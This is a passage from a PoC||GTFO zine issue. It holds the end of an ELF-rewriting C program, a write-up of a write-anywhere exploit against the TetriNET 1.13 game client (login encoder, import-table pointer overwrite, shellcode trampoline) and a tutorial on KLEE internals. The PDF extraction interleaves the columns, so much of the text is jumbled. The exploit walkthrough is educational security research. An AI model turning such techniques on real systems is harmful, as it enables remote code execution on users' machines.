41 e h d r = ( ElfW ( Ehdr ) ∗ )mem ;


phdr = ( ElfW ( Phdr ) ∗ )&mem [ e h d r−>e _ p h o f f ] ;
43 s h d r = ( ElfW ( Shdr ) ∗ )&mem [ e h d r−>e _ s h o f f ] ;
S t r i n g T a b l e = ( char ∗ )&mem [ s h d r [ e h d r−>e _ s h s t r n d x ] . s h _ o f f s e t ] ;
45
p r i n t f ( " Marking e_type t o ET_DYN\ n " ) ;
47 e h d r−>e_type = ET_DYN;

49 p r i n t f ( " U p d a t i n g PT_LOAD s e g m e n t s t o become r e l o c a t a b l e f r o m b a s e 0\ n " ) ;


f o r ( i = 0 ; i < e h d r−>e_phnum ; i ++) {
51 i f ( phdr [ i ] . p_type == PT_LOAD && phdr [ i ] . p _ o f f s e t == 0 ) {
o l d _ b a s e = phdr [ i ] . p_vaddr ;
53 phdr [ i ] . p_vaddr = 0UL ;
phdr [ i ] . p_paddr = 0UL ;
55 phdr [ i + 1 ] . p_vaddr = HUGE_PAGE + phdr [ i + 1 ] . p _ o f f s e t ;
phdr [ i + 1 ] . p_paddr = HUGE_PAGE + phdr [ i + 1 ] . p _ o f f s e t ;
57 } e l s e i f ( phdr [ i ] . p_type == PT_NOTE) {
phdr [ i ] . p_vaddr = phdr [ i ] . p _ o f f s e t ;
59 phdr [ i ] . p_paddr = phdr [ i ] . p _ o f f s e t ;
} e l s e i f ( phdr [ i ] . p_type == PT_TLS) {
61 phdr [ i ] . p_vaddr = HUGE_PAGE + phdr [ i ] . p _ o f f s e t ;
phdr [ i ] . p_paddr = HUGE_PAGE + phdr [ i ] . p _ o f f s e t ;
63 new_data_base = phdr [ i ] . p_vaddr ;
}
65 }
/∗
67 ∗ I f we don ’ t u p d a t e t h e s e c t i o n h e a d e r s t o r e f l e c t t h e new a d d r e s s
∗ s p a c e t h e n GDB and objdump w i l l b e b r o k e n w i t h t h i s b i n a r y .
69 ∗/
f o r ( i = 0 ; i < e h d r−>e_shnum ; i ++) {
71 i f ( ! ( s h d r [ i ] . s h _ f l a g s & SHF_ALLOC) )
continue ;
73 s h d r [ i ] . sh_addr = ( s h d r [ i ] . sh_addr < o l d _ b a s e + HUGE_PAGE)
? 0UL + s h d r [ i ] . s h _ o f f s e t
75 : new_data_base + s h d r [ i ] . s h _ o f f s e t ;
p r i n t f ( " S e t t i n g %s sh_addr t o %#l x \ n " , &S t r i n g T a b l e [ s h d r [ i ] . sh_name ] , s h d r [ i ] . sh_addr ) ;
77 }
p r i n t f ( " S e t t i n g new e n t r y p o i n t : %#l x \ n " , e h d r−>e _ e n t r y − o l d _ b a s e ) ;
79 e h d r−>e _ e n t r y = e h d r−>e _ e n t r y − o l d _ b a s e ;
munmap (mem, s t . s t _ s i z e ) ;
81 exit (0) ;
fail :
83 e x i t ( −1) ;
}

Figure 25. static_to_dyn.c

47
18:07 A Trivial Exploit for TetriNET; or,
Update Player TranslateMessage to Level Shellcode.
by John Laky and Kyle Hanslovan

Lo, the year was 1997 and humanity com-


# login string looks li k e
pletes its greatest feat yet—nearly thirty years af- 2 # ‘ ‘ < n i c k > <v e r s i o n > <s e r v e r i p > ’ ’
ter NASA delivers the lunar landings, St0rmCat # ex : TestUser 1 . 1 3 1 2 7 . 0 . 0 . 1
releases TetriNET, a gritty multiplayer reboot of 4 def en co de ( n i c k , v e r s i o n , i p ) :
the gaming monolith Tetris, bringing capitalists and dec = 2
6 s = ’ t e t r i s s t a r t %s %s ’ % ( n i c k , v e r s i o n )
communists together in competitive, adrenaline- h = s t r ( 5 4 ∗ i p [ 0 ] + 41∗ i p [ 1 ]
pumping, line-annihilating, block-crushing action, 8 + 29∗ i p [ 2 ] + 17∗ i p [ 3 ] )
all set to a period-appropriate synthetic soundtrack encodeS = dec2hex ( dec )
that would make Gorbachev blush. TetriNET holds 10
f o r i in range ( len ( s ) ) :
the dubious distinction of hosting one of the most hi- 12 dec = ( ( dec + ord ( s [ i ] ) ) % 2 5 5 )
larious bugs ever discovered, where sending a offset ^ ord ( h [ i % len ( h ) ] )
and overwritable address in a stringified game state 14 s 2 = dec2hex ( dec )
encodeS += s 2
update will jump to any address of our choosing.
16
The TetriNET protocol is largely a trusted two- return encodeS
way ASCII-based message system with a special
binascii encoded handshake for login.37 Although
there is an official binary (v1.13), this protocol en-
One of the many updates a TetriNET client can
joyed several implementations that aid in its reverse
send to the server is the level update, an 0xFF ter-
engineering, including a Python server/client imple-
minated string of the form:
mentation.38 Authenticating to a TetriNET server
using a custom encoding scheme, a rotating xor de- 1 l v l <p l a y e r number> < l e v e l number>\ x f f
rived from the IP address of the server. One could
spend ages reversing the C++ binary for this algo-
rithm, but The Great Segfault punishes wasted time The documentation states acceptable values for
and effort, and our brethren at Pytrinet already the player number range 1-6, a caveat that should
have a Python implementation. pique the interest of even nascent bit-twiddlers. Pre-
dictably, sending a player number of 0x20 and a level
of 0x00AABBCC crashes the binary through a write-
anywhere bug. The only question now is which is
easier: overwriting a return address on a stack or a
stomping on a function pointer in a v-table or some-
thing. A brief search for the landing zone yields the
answer:
1 00454314: 77 f 1 e c c e 77 f 1 a d 2 3 77 f 1 5 f e 0 77 f 1 7 0 0 a 77 f 1 d 9 6 9
00454328: 00 a a b b c c 77 f 2 7 0 9 0 77 f 1 6 f 7 9 00000000 7 e429766
3 0045433 c : 7 e43ee5d 7 e41940c 7 e44faf5 7 e42fbbd 7 e42aeab

37 unzip pocorgtfo18.pdf iTetrinet-wiki.zip


38 http://pytrinet.ddmr.nl/

48
Praise the Stack! We landed inside the import
sub_424620 sub_424620 p r o c n e a r
table. 2 sub_424620
1 . idata :00454324 sub_424620 var_20 = b y t e p t r −20h
; HBRUSH _ _ s t d c a l l 4 sub_424620 Msg = MSG p t r −1Ch
3 ; C r e a t e B r u s h I n d i r e c t ( const LOGBRUSH ∗ ) sub_424620
e x t r n __imp_CreateBrushIndirect : dword 6 sub_424620 push ebx
5 ;DATA XREF: C r e a t e B r u s h I n d i r e c t r sub_424620+1 push e s i
8 sub_424620+2 add esp , 0FFFFFFE0h
7 . idata :00454328 sub_424620+5 mov e s i , eax
; HBITMAP _ _ s t d c a l l 10 sub_424620+7 x o r ebx , ebx
9 ; CreateBitmap ( int , int , UINT , UINT , sub_424620+9 push 1 ; wRemoveMsg
; const void ∗ ) 12 sub_424620+B push 0 ; wMsgFilterMax
11 e x t r n __imp_CreateBitmap : dword sub_424620+D push 0 ; wMsgFilterMin
; DATA XREF: CreateBitmapr 14 sub_424620+F push 0 ; hWnd
13 sub_424620+11 l e a eax , [ e s p +30h+Msg ]
. i d a t a : 0 0 4 5 4 3 2C 16 sub_424620+15 push eax ; lpMsg
15 ; HENHMETAFILE _ _ s t d c a l l sub_424620+16 c a l l PeekMessageA
; CopyEnhMetaFileA (HENHMETAFILE, LPCSTR) 18 sub_424620+1B t e s t eax , eax
17 e x t r n __imp_CopyEnhMetaFileA : dword ...
; DATA XREF: CopyEnhMetaFileAr 20 sub_424620+8E l e a eax , [ e s p +20h+Msg ]
sub_424620+92 push eax ; lpMsg
22 sub_424620+93 c a l l TranslateMessage << ! !
sub_424620+98 l e a eax , [ e s p +20h+Msg ]
Now we have a plan to overwrite an often- 24 sub_424620+9C push eax ; lpMsg
sub_424620+9D c a l l DispatchMessageA
called function pointer with a useful address, but 26 sub_424620+A2 jmp short loc_4246C8
which one? There are a few good candidates, and
a look at the imports reveals a few of particular
interest: PeekMessageA, DispatchMessageA, and Adjusting our firing solution to overwrite the ad-
TranslateMessage, indicating TetriNET relies on dress of TranslateMessage (remember the vulnera-
Windows message queues for processing. Because ble instruction multiplies the player number by the
these are usually handled asynchronously and ap- size of a pointer; scale the payload accordingly) and
plications receive a deluge of messages during nor- voila! EIP jumps to our provided level number.
mal operation, these are perfect candidates for cor- Now, all we have to do is jump to some shell-
ruption. Indeed, TetriNET implements a Peek- code. This may be a little trickier than it seems at
MessageA / TranslateMessage / DispatchMess- first glance.
ageA subroutine. The first option: with a stable write-anywhere
bug, we could write shellcode into an rwx section
and jump to it. Unfortunately, the level number
that eventually becomes ebx in the vulnerable in-
struction is a signed double word, and only posi-
tive integers can be written without raising an error.
We could hand-craft some clever shellcode that only
uses bytes smaller than 0x80 in key locations, but
there must be a better way.
The second option: we could attempt to write
our shellcode three bytes at a time instead of four,
working backward from the end of an RWX sec-
tion, always writing double words with one positive-
integer-compliant byte followed by three bytes of
shellcode, always overwriting the useless byte of the
last write. Alas, the vulnerable instruction enforces
4-byte aligned writes:
0044 B963 mov ds : dword_453F28 [ eax ∗ 4 ] , ebx

49
The third option: we could patch either the trampoline to load that pointer into a register and
positive-integer-compliant check or the vulnerable jump to it:
instruction to allow us to perform either of the first
0: a1 bc 37 45 00 mov eax , ds : 0 x4537bc
two options. Alas, the page containing this code is 2 5: f f e0 jmp eax
not writable.
1 00401000 ; Segment t y p e : Pure code
00401000 ; Segment perms : Read/ Execute Voila! Login as shellcode, update your level to
the trampoline, smash the pointer to Translate-
Message and pull the trigger on the windows mes-
Suddenly, the Stack grants us a brief moment of sage pump and rejoice in the shiny goodness of a
clarity in our moment of desperation: because the running exploit. The Stack would be proud! While
login encoding accepts an arbitrary binary string as a host of vulnerabilities surely lie in wait betwixt
the nickname, all manner of shellcode can be passed the subroutines of tetrinet.exe, this vulnerabil-
as the nickname, all we have to do is find a way to ity’s shameless affair with the player is truly one for
jump to it. Surely, there must be a pointer some- the ages.
where in the data section to the nickname we can Scripts and a reference tetrinet executable are
use to jump it. After a brief search, we discover attached to this PDF,39 and the editors of this
there is indeed a static value pointing to the login fine journal have resurrected the abandoned web-
nickname in the heap. Now, we can write a small site, http://tetrinet.us/.

39 unzip pocorgtfo18.pdf tetrinet.zip

50
18:08 A Guide to KLEE LLVM Execution Engine Internals
by Julien Vanegue

Greetings fellow neighbors! (mostly variable values) that are shared across the
It is my great pleasure to finally write my first node don’t have to be copied from state to state un-
article in PoCkGTFO after so many of you have con- less they are written to. This allows KLEE to scale
tributed excellent content in the past dozens of is- better under memory pressure. Such state contains
sues that Pastor Laphroig put together for our en- both a list of symbolic constraints that are known to
joyment. I have been waiting for this moment for be true in this state, as well as a concrete store for
some time, and been harassed a few times, to fi- program variables on which constraints may or may
nally come up with something worthwhile. Given not be applied (but that are nonetheless necessary
the high standards set upon all of us, I did not feel so the program can execute in KLEE).
like rushing it. Instead, I bring to you today what I My goal in this article is not so much to show
think will be a useful piece of texts for many fellow you how to use KLEE, which is well understood,
hackers to use in the future. Apologies for any er- but bring you a tutorial on hacking KLEE internals.
rors that may have slipped from my understanding, This will be useful if you want to add features or add
I am getting older after all, and my memory is not support for specific analysis scenarios that you care
what it used to be. Not like it has ever been infail- about. I’ve spent hundreds of hours in KLEE inter-
lible but at least I used to remember where the cool nals and having such notes may have helped me in
kids hung out. This is my attempt at renewing the the beginning. I hope it helps you too.
tradition of sharing knowledge through some more Now let’s get started.
informal channels.
Today, I would like to talk to you about KLEE, Working with Constraints
an open source symbolic execution engine originally
developed at Stanford University and now main- Let’s look at the simple C program as a motivator.
tained at Imperial College in London. Symbolic Ex- int f c t ( int a , int b ) {
ecution (SYMEX) stands somewhere between static 2 int c = 0 ;
analysis of programs and [dynamic] fuzz testing. i f (a < b)
4 c++;
While its theoretical foundations dates back from else
the late seventies (King’s paper), practical appli- 6 c −−;
cation of it waited until the late 2000s (such as return c ;
SAGE40 at Microsoft Research) to finally become 8 }
mainstream with KLEE in 2008. These tools have 10 i n t main ( i n t a r g c , char ∗∗ a r g v ) {
been used in practice to find thousands of security i f ( a r g c != 3 ) return ( −1) ;
issues in software, going from simple NULL pointer 12 int a = a t o i ( argv [ 1 ] ) ;
int b = a t o i ( argv [ 2 ] ) ;
dereferences, to out of bound reads or writes for
14 i f (a < b)
both the heap and the stack, including use-after- return ( 0 ) ;
free vulnerabilities and other type-state issues that 16 return f c t ( a , b ) ;
can be easily defined using “asserts.” }

In one hand, symbolic execution is able to un-


dergo concrete execution of the analyzed program
and maintains a concrete store for variable values as It is clear that the path starting in main and con-
the execution progresses, but it can also track path tinuing in the first if (a < b) is infeasible. This is
conditions using constraints. This can be used to because any such path will actually have finished
verify the feasibility of a specific path. At the same with a return (0) in the main function already.
time, a process tree (PTree) of nodes (PTreeNode) The way KLEE can track this is by listing con-
represent the state space as an ImmutableTree straints for the path conditions.
structure. The ImmutableTree implements a copy- This is how it works: first KLEE executes some
on-write mechanism so that parts of the state bootstrapping code before main takes control, then
40 unzip pocorgtfo18.pdf automatedwhiteboxfuzzing.pdf

51
starts executing the first LLVM instruction of the floating point analysis and I tend not to mod-
main function. Upon reaching the first if statement, ify these cases, however this is where to look
KLEE forks the state space (via function Executor- if you’re interested in that.
::fork). The left node has one more constraint
(argc != 3) while the right node has constraint • Alloca: used to allocate memory of a desired
(argc == 3). KLEE eventually comes back to its size
main routine (Executor::run), adds the newly-
generated states into the set of active states, and • Load/Store: Memory access operations at a
picks up a new state to continue analysis with. given address

• GetElementPtr: perform array or structure


Executor Class read/write at certain index
The main class in KLEE is called the • PHI: This corresponds to the PHI function in
Executor class. It has many methods such as the Static Single Assignment form (SSA) as
Executor::run(), which is the main method of defined in the literature.41
the class. This is where the set of states: added
states and removed states set are manipulated to There are other instructions I am glossing over but
decide which state to visit next. Bear in mind that you can refer to the LLVM reference manual for an
nothing guarantees that next state in the Executor exhaustive list.
class will be the next state in the current path. So far the execution in KLEE has gone
Figure 26 shows all of the LLVM instructions through Executor::run() -> Executor::exe-
currently supported by KLEE. cuteInstruction() -> case ... but we have
not looked at what these cases actually do in
• Call/Br/Ret: Control flow instructions. KLEE. This is handled by a class called the
These are cases where the program counter ExecutionState that is used to represent the state
(part of the state) may be modified by more space.
than just the size of the current instruction.
In the case of Call and Ret, a new ob-
ject StackFrame is created where local vari- ExecutionState Class
ables are bound to the called function and
This class is declared in include/klee/Execution-
destroyed on return. Defining new variables
State.h and contains mostly two objects:
may be achieved through the KLEE API
bindObjectInState(). • AddressSpace: contains the list of all meta-
data for the process objects in this state,
• Add/Sub/Mul/*S*/U*/*Or*: The Signed and
including global, local, and heap objects.
Unsigned arithmetic instructions. The usual
The address space is basically made of an
suspects including bit shifting operations as
array of objects and routines to resolve
well.
concrete addresses to objects (via method
• Cast operations (UItoFP, FPtoUI, IntToPtr, AddressSpace::resolveOne to resolve one
PtrToInt, BitCast, etc.): used to convert by picking up the first match, or method
variables from one type to a variable of a dif- AddressSpace::resolve for resolving to a
ferent type. list of objects that may match). The
AddressSpace object also contains a concrete
• *Ext* instructions: these extend a variable to store for objects where concrete values can
use a larger number of bits, for example 8b be read and written to. This is useful when
to 32b, sometimes carrying the sign bit or the you’re tracking a symbolic variable but sud-
zero bit. dently need to concretize it to make an ex-
ternal concrete function call in libc or some
• F* instructions: the floating point arithmetic other library that you haven’t linked into your
instructions in KLEE. I dont myself do much LLVM module.
41 unzip pocorgtfo18.pdf cytron.pdf

52
1 $ g r e p −r n i ’ c a s e I n s t r u c t i o n : : ’ l i b / Core /
l i b / Core / E x e c u t o r . cpp : 2 4 5 2 : case I n s t r u c t i o n : : Ret : {
3 l i b / Core / E x e c u t o r . cpp : 2 5 9 1 : case I n s t r u c t i o n : : Br : {
l i b / Core / E x e c u t o r . cpp : 2 6 1 9 : case I n s t r u c t i o n : : S wi tc h : {
5 l i b / Core / E x e c u t o r . cpp : 2 7 3 1 : case I n s t r u c t i o n : : U n r e a c h a b l e :
l i b / Core / E x e c u t o r . cpp : 2 7 3 9 : case I n s t r u c t i o n : : I n v o k e :
7 l i b / Core / E x e c u t o r . cpp : 2 7 4 0 : case I n s t r u c t i o n : : C a l l : {
l i b / Core / E x e c u t o r . cpp : 2 9 8 7 : case I n s t r u c t i o n : : PHI : {
9 l i b / Core / E x e c u t o r . cpp : 2 9 9 5 : case I n s t r u c t i o n : : S e l e c t : {
l i b / Core / E x e c u t o r . cpp : 3 0 0 6 : case I n s t r u c t i o n : : VAArg :
11 l i b / Core / E x e c u t o r . cpp : 3 0 1 2 : case I n s t r u c t i o n : : Add : {
l i b / Core / E x e c u t o r . cpp : 3 0 1 9 : case I n s t r u c t i o n : : Sub : {
13 l i b / Core / E x e c u t o r . cpp : 3 0 2 6 : case I n s t r u c t i o n : : Mul : {
l i b / Core / E x e c u t o r . cpp : 3 0 3 3 : case I n s t r u c t i o n : : UDiv : {
15 l i b / Core / E x e c u t o r . cpp : 3 0 4 1 : case I n s t r u c t i o n : : SDiv : {
l i b / Core / E x e c u t o r . cpp : 3 0 4 9 : case I n s t r u c t i o n : : URem: {
17 l i b / Core / E x e c u t o r . cpp : 3 0 5 7 : case I n s t r u c t i o n : : SRem : {
l i b / Core / E x e c u t o r . cpp : 3 0 6 5 : case I n s t r u c t i o n : : And : {
19 l i b / Core / E x e c u t o r . cpp : 3 0 7 3 : case I n s t r u c t i o n : : Or : {
l i b / Core / E x e c u t o r . cpp : 3 0 8 1 : case I n s t r u c t i o n : : Xor : {
21 l i b / Core / E x e c u t o r . cpp : 3 0 8 9 : case I n s t r u c t i o n : : S h l : {
l i b / Core / E x e c u t o r . cpp : 3 0 9 7 : case I n s t r u c t i o n : : LShr : {
23 l i b / Core / E x e c u t o r . cpp : 3 1 0 5 : case I n s t r u c t i o n : : AShr : {
l i b / Core / E x e c u t o r . cpp : 3 1 1 5 : case I n s t r u c t i o n : : ICmp : {
25 l i b / Core / E x e c u t o r . cpp : 3 2 0 7 : case I n s t r u c t i o n : : A l l o c a : {
l i b / Core / E x e c u t o r . cpp : 3 2 2 1 : case I n s t r u c t i o n : : Load : {
27 l i b / Core / E x e c u t o r . cpp : 3 2 2 6 : case I n s t r u c t i o n : : S t o r e : {
l i b / Core / E x e c u t o r . cpp : 3 2 3 4 : case I n s t r u c t i o n : : GetElementPtr : {
29 l i b / Core / E x e c u t o r . cpp : 3 2 8 9 : case I n s t r u c t i o n : : Trunc : {
l i b / Core / E x e c u t o r . cpp : 3 2 9 8 : case I n s t r u c t i o n : : ZExt : {
31 l i b / Core / E x e c u t o r . cpp : 3 3 0 6 : case I n s t r u c t i o n : : SExt : {
l i b / Core / E x e c u t o r . cpp : 3 3 1 5 : case I n s t r u c t i o n : : IntToPtr : {
33 l i b / Core / E x e c u t o r . cpp : 3 3 2 4 : case I n s t r u c t i o n : : PtrToInt : {
l i b / Core / E x e c u t o r . cpp : 3 3 3 4 : case I n s t r u c t i o n : : B i t C a s t : {
35 l i b / Core / E x e c u t o r . cpp : 3 3 4 3 : case I n s t r u c t i o n : : FAdd : {
l i b / Core / E x e c u t o r . cpp : 3 3 5 8 : case I n s t r u c t i o n : : FSub : {
37 l i b / Core / E x e c u t o r . cpp : 3 3 7 2 : case I n s t r u c t i o n : : FMul : {
l i b / Core / E x e c u t o r . cpp : 3 3 8 7 : case I n s t r u c t i o n : : FDiv : {
39 l i b / Core / E x e c u t o r . cpp : 3 4 0 2 : case I n s t r u c t i o n : : FRem : {
l i b / Core / E x e c u t o r . cpp : 3 4 1 7 : case I n s t r u c t i o n : : FPTrunc : {
41 l i b / Core / E x e c u t o r . cpp : 3 4 3 4 : case I n s t r u c t i o n : : FPExt : {
l i b / Core / E x e c u t o r . cpp : 3 4 5 0 : case I n s t r u c t i o n : : FPToUI : {
43 l i b / Core / E x e c u t o r . cpp : 3 4 6 7 : case I n s t r u c t i o n : : FPToSI : {
l i b / Core / E x e c u t o r . cpp : 3 4 8 4 : case I n s t r u c t i o n : : UIToFP : {
45 l i b / Core / E x e c u t o r . cpp : 3 5 0 0 : case I n s t r u c t i o n : : SIToFP : {
l i b / Core / E x e c u t o r . cpp : 3 5 1 6 : case I n s t r u c t i o n : : FCmp: {
47 l i b / Core / E x e c u t o r . cpp : 3 6 0 8 : case I n s t r u c t i o n : : I n s e r t V a l u e : {
l i b / Core / E x e c u t o r . cpp : 3 6 3 5 : case I n s t r u c t i o n : : E x t r a c t V a l u e : {
49 l i b / Core / E x e c u t o r . cpp : 3 6 4 5 : case I n s t r u c t i o n : : Fence : {
l i b / Core / E x e c u t o r . cpp : 3 6 4 9 : case I n s t r u c t i o n : : I n s e r t E l e m e n t : {
51 l i b / Core / E x e c u t o r . cpp : 3 6 9 1 : case I n s t r u c t i o n : : E x t r a c t E l e m e n t : {
l i b / Core / E x e c u t o r . cpp : 3 7 2 4 : case I n s t r u c t i o n : : S h u f f l e V e c t o r :

Figure 26. LLVM Instructions supported by KLEE

53
• ConstraintManager: contains the list of all Using these methods, checking for boundary con-
symbolic constraints available in this state. By ditions is child’s play. It becomes more interesting
default, KLEE stores all path conditions in the when symbolics are used as the conditions that must
constraint manager for that state, but it can be checked involves more than constants, depending
also be used to add more constraints of your on whether the base address, the offset or the index
choice. Not all objects in the AddressSpace are symbolic values (or possibly depending on the
may be subject to constraints, which is left to source data for certain analyses, for example taint
the discretion of the KLEE programmer. Ver- analysis).
ifying that these constraints are satisfiable can While the MemoryObject somehow takes care of
be done by calling solver->mustBeTrue() or the spatial integrity of the object, the ObjectState
solver->MayBeTrue() methods, which is a class is used to access the memory value itself in the
solver-independent API provided in KLEE to state. Its most useful methods are:
call SMT or Z3 independently of the low-level // r e t u r n b y t e s r e a d .
solver API. This comes handy when you want r e f <Expr> r e a d ( r e f <Expr> o f f s e t ,
to check the feasibility of certain variable val- Expr : : Width width ) ;
ues during analysis. r e f <Expr> r e a d ( unsigned o f f s e t ,
Expr : : Width width ) ;
Every time the ::fork() method is called, r e f <Expr> r e a d 8 ( unsigned o f f s e t ) ;
one execution state is split into two where pos-
// r e t u r n b y t e s w r i t t e n .
sibly more constraints or different values have void w r i t e ( unsigned o f f s e t ,
been inserted in these objects. One may call the r e f <Expr> v a l u e ) ;
Executor::branch() method directly to create a void w r i t e ( r e f <Expr> o f f s e t ,
r e f <Expr> v a l u e ) ;
new state from the existing state without creating
void w r i t e 8 ( unsigned o f f s e t ,
a state pair as fork would do. This is useful when uint8_t value ) ;
you only want to add a subcase without following void w r i t e 1 6 ( unsigned o f f s e t ,
the exact fork expectations. uint16_t value ) ;
void w r i t e 3 2 ( unsigned o f f s e t ,
uint32_t value ) ;
Executor::executeMemoryOperation(), void w r i t e 6 4 ( unsigned o f f s e t ,
uint64_t value ) ;
MemoryObject and ObjectState
Two important classes in KLEE are MemoryObject
and ObjectState, both defined in lib/klee/- Objects can be either concrete or symbolic, and
Core/Memory.h. these methods implement actions to read or write
The MemoryObject class is used to represent the object depending on this state. One can switch
an object such as a buffer that has a base ad- from concrete to symbolic state by using methods:
dress and a size. When accessing such an object,
void makeConcrete ( ) ;
typically via the Executor::executeMemoryOper- void makeSymbolic ( ) ;
ation() method, KLEE automatically ensures that
accesses are in bound based on known base address,
desired offset, and object size information. The
These methods will just flush symbolics if we
MemoryObject class provides a few handy methods:
become concrete, or mark all concrete variables as
(...) symbolics from now on if we switch to symbolic
r e f <ConstantExpr> getBaseExpr ( )
mode. Its good to play around with these meth-
r e f <ConstantExpr> g e t S i z e E x p r ( )
r e f <Expr> g e t O f f s e t E x p r ( r e f <Expr> p o i n t e r ) ods to see what happens when you write the value
r e f <Expr> g et B o u n ds C h e ck P o i nt e r ( of a variable, or make a new variable symbolic and
r e f <Expr> p o i n t e r ) so on.
r e f <Expr> g et B o u n ds C h e ck P o i nt e r (
r e f <Expr> p o i n t e r , unsigned b y t e s )
When Instruction::Load and ::Store are
r e f <Expr> g e t B o u n d s C h e c k O f f s e t ( encountered, the Executor::executeMemory-
r e f <Expr> o f f s e t ) Operation() method is called where symbolic
r e f <Expr> g e t B o u n d s C h e c k O f f s e t ( array bounds checking is implemented. This
r e f <Expr> o f f s e t , unsigned b y t e s )
implementation uses a mix of MemoryObject,
ObjectState, AddressSpace::resolveOne() and

54
MemoryObject::getBoundsCheckOffset() to fig- into visible assertions. KLEE does not make much
ure out whether any overflow condition can happen. use of these stubs and mostly generate a warning if
If so, it calls KLEE’s internal API Executor::- you reach one of the ASan-defined stubs.
terminateStateOnError() to signal the memory Other recent additions were klee_open_merge()
safety issue and terminate the current state. Sym- and klee_close_merge() that are an annotation
bolic execution will then resume on other states so mechanism to perform selected merging in KLEE.
that KLEE does not stop after the first bug it finds. Merging happens when you come back from a con-
As it finds more errors, KLEE saves the error lo- ditional contruct (e.g., switch, or when you must
cations so it won’t report the same bugs over and define whether to continue or break from a loop) as
over. you must select which constraints and values will
hold in the state immediately following the merge.
KLEE has some interesting merging logic imple-
Special Function Handlers
mented in lib/Core/MergeHandler.cpp that are
A bunch of special functions are defined in KLEE worth taking a look at.
that have special handlers and are not treated
as normal functions. See lib/Core/SpecialFun- Experiment with KLEE for yourself !
ctionHandler.cpp.
Some of these special functions are called from I did not go much into details of how to install KLEE
the Executor::executeInstruction() method in as good instructions are available onine.42 Try it for
the case of the Instruction::Call instruction. yourself!
All the klee_* functions are internal KLEE I personally use LLVM 3.4 mostly but KLEE also
functions which may have been produced by anno- supports LLVM 3.5 reliably, although as far as I
tations given by the KLEE analyst. (For example, know 3.4 is still recommended.
you can add a klee_assume(p) somewhere in the My setup is an amd64 machine on Ubuntu 16.04
analyzed program’s code to say that p is assumed that has most of what you will need in packages. I
to be true, thereby some constraints will be pushed recommend building LLVM and KLEE from sources
into the ConstraintManager of the currenet state as well as all dependencies (e.g., Z343 and/or STP44 )
without checking them.) Other functions such as that will help you avoid weird symbol errors in your
malloc, free, etc. are not treated as normal function experiments.
in KLEE. Because the malloc size could be sym- A good first target to try KLEE on is coreutils,
bolic, KLEE needs to concretize the size according which is what prettty much everybody uses in their
to a few simplistic criteria (like size = 0, size = research papers evaluation nowadays. Coreutils is
28 , size = 216 , etc.) to continue making progress. well tested so new bugs in it are scarce, but its good
Suffice to say this is quite approximate. to confirm everything works okay for you. A tuto-
This logic is implemented in the rial on how to run KLEE on coreutils is available as
Executor::executeAlloc() and ::executeFree() part of the project website.45
methods. I have hacked around some modifications I personally used KLEE on various targets: core-
to track the heap more precisely in KLEE, how- utils, busybox, as well as other standard network
ever bear in mind that KLEE’s heap as well as the tools that take input from untrusted data. These
target program’s heap are both maintained within will require a standalone research paper explaining
the same address space, which is extremely intru- how KLEE can be used to tackle these targets.
sive. This makes KLEE a bad framework for layout
sensitive analysis, which many exploit generation
problems require nowadays. Other special functions
include stubs for Address Sanitizer (ASan), which
is now included in LLVM and can be enabled while
creating LLVM code with clang. ASan is mostly use-
ful for fuzzing so normally invisible corruptions turn
42 http://klee.github.io/build-llvm34/
43 unzip pocorgtfo18.pdf z3.pdf
44 unzip pocorgtfo18.pdf stp.pdf
45 http://klee.github.io/docs/coreutils-experiments/

55
$ g r e p −i n add \ ( l i b / Core / S p e c i a l F u n c t i o n H a n d l e r . cpp
2 66:# d e f i n e add ( name , h a n d l e r , r e t ) { name , \
8 1 : add ( " c a l l o c " , h a n d l e C a l l o c , t r u e ) ,
4 8 2 : add ( " f r e e " , h a n d l e F r e e , f a l s e ) ,
8 3 : add ( " klee_assume " , handleAssume , f a l s e ) ,
6 8 4 : add ( " klee_check_memory_access " , handleCheckMemoryAccess , f a l s e ) ,
8 5 : add ( " k l e e _ g e t _ v a l u e f " , handleGetValue , t r u e ) ,
8 8 6 : add ( " k l e e _ g e t _ v a l u e d " , handleGetValue , t r u e ) ,
8 7 : add ( " k l e e _ g e t _ v a l u e l " , handleGetValue , t r u e ) ,
10 8 8 : add ( " k l e e _ g e t _ v a l u e l l " , handleGetValue , t r u e ) ,
8 9 : add ( " k l e e _ g e t _ v a l u e _ i 3 2 " , handleGetValue , t r u e ) ,
12 9 0 : add ( " k l e e _ g e t _ v a l u e _ i 6 4 " , handleGetValue , t r u e ) ,
9 1 : add ( " k l e e _ d e f i n e _ f i x e d _ o b j e c t " , h a n d l e D e f i n e F i x e d O b j e c t , f a l s e ) ,
14 9 2 : add ( " k l e e _ g e t _ o b j _ s i z e " , h a n d l e G e t O b j S i z e , t r u e ) ,
9 3 : add ( " k l e e _ g e t _ e r r n o " , handleGetErrno , t r u e ) ,
16 9 4 : add ( " k l e e _ i s _ s y m b o l i c " , h a n d l e I s S y m b o l i c , t r u e ) ,
9 5 : add ( " klee_make_symbolic " , handleMakeSymbolic , f a l s e ) ,
18 9 6 : add ( " klee_mark_global " , handleMarkGlobal , f a l s e ) ,
9 7 : add ( " klee_open_merge " , handleOpenMerge , f a l s e ) ,
20 9 8 : add ( " k l e e _ c l o s e _ m e r g e " , handleCloseMerge , f a l s e ) ,
9 9 : add ( " k l e e _ p r e f e r _ c e x " , h a n d l e P r e f e r C e x , f a l s e ) ,
22 1 0 0 : add ( " k l e e _ p o s i x _ p r e f e r _ c e x " , h a n d l e P o s i x P r e f e r C e x , f a l s e ) ,
1 0 1 : add ( " k l e e _ p r i n t _ e x p r " , h a n d l e P r i n t E x p r , f a l s e ) ,
24 1 0 2 : add ( " k l e e _ p r i n t _ r a n g e " , han dl ePr int Ran ge , f a l s e ) ,
1 0 3 : add ( " k l e e _ s e t _ f o r k i n g " , h a n d l e S e t F o r k i n g , f a l s e ) ,
26 1 0 4 : add ( " k l e e _ s t a c k _ t r a c e " , h a n d l e S t a c k T r a c e , f a l s e ) ,
1 0 5 : add ( " k l e e _ w a r n i n g " , handleWarning , f a l s e ) ,
28 1 0 6 : add ( " klee_warning_once " , handleWarningOnce , f a l s e ) ,
1 0 7 : add ( " k l e e _ a l i a s _ f u n c t i o n " , h a n d l e A l i a s F u n c t i o n , f a l s e ) ,
30 1 0 8 : add ( " m a l l o c " , h a n d l e M a l l o c , t r u e ) ,
1 0 9 : add ( " r e a l l o c " , h a n d l e R e a l l o c , t r u e ) ,
32 1 1 2 : add ( " x m a l l o c " , h a n d l e M a l l o c , t r u e ) ,
1 1 3 : add ( " x r e a l l o c " , h a n d l e R e a l l o c , t r u e ) ,
